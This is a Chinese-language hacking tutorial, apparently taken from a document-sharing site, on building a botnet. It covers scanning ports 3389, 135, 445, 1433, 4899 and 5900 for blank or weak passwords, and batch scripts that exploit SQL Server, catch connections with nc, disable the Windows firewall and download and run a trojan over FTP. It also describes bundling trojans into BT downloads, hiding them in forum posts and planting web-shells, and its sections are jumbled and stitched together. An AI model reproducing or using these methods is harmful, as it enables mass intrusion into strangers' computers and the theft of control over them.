看了上面的入侵方法,虽然种类很多,但是大家做好以下列出的防范方法,就能帮助大家不受挂马和病毒的侵扰了!第一. 杀毒软件杀毒软件必装,至于说装1个,2个还是3个那都是个人喜好,哪怕装20个也没人说你不对.这里可能有些朋友会说,我比较喜欢裸奔,裸奔这么久也没事呀.人们常说久走夜路必撞鬼现在你或许没事,不代表以后没事.所以我还是建议大家装一个杀毒软件,毕竟花不了多少时间.相比中毒后重装系统所花时间相比,我想下载安装杀毒软件或许更快吧..第二. 安装辅助软件.360卫士,金山卫士等.这些安全辅助软件既能优化系统,又可以智能安装补丁.还可以直观的反应系统中可能存在的一些风险,下载安装一个一举几得.而且也比较方便第三. 封闭不需要用到的端口和服务关闭系统中不必要的端口、服务、共享等.因为很多时候多数网友都只借助360卫士做了优化,这点却忘记做了,如果关闭这些呢?但是可以查看本站的一篇文章:如何关闭端口。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)
7、扫4899空口令抓肉鸡
工具:端口扫描器 4899探测器 Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。
8、扫5900端口抓VNC肉鸡
工具:VNC扫描器 VNC连接器
3、扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
4Hale Waihona Puke 入侵网站挂马 这个我也不会,准备学习,在这里也提一下吧。比如你要入侵一个网站,首先得用工具扫一下漏洞,然后凭借这些漏洞上传你做好的ASP网马,然后运行你的ASP网马,你就可以对这个网站的网页进行一系列修改,比如在他主页插入你的木马地址,这样别人在浏览这个网站的主页时就会中你的马了。中间过程也挺复杂了,我也只了解一点点,如果说错了还请各位批评指正。
忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。
5、扫1433抓肉鸡之方法2
要用到的工具:端口扫描器 X-scan SQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。
开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。
1、BT挂马
顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候 当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。 :lol
4、1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。
要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件
首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
3、用RM在论坛挂马
首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性:lol ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了:lol 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。
各端口抓肉鸡的几种方法.txt
1、扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)
现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。
1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口
然后再写个批处理
@echo off
Nc -l -vv -p 556>daima.txt
echo username>>daima.txt
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
上面的步骤都搞好后,就可以开始扫肉鸡了。
先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了。
2、免费空间挂马
其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的,很容易吧? :lol :lol
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv
扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。
6、用WINNTAutoAttack扫SA弱口令抓肉鸡
其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下,呵呵。
工具:WINNTAutoAttack SQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。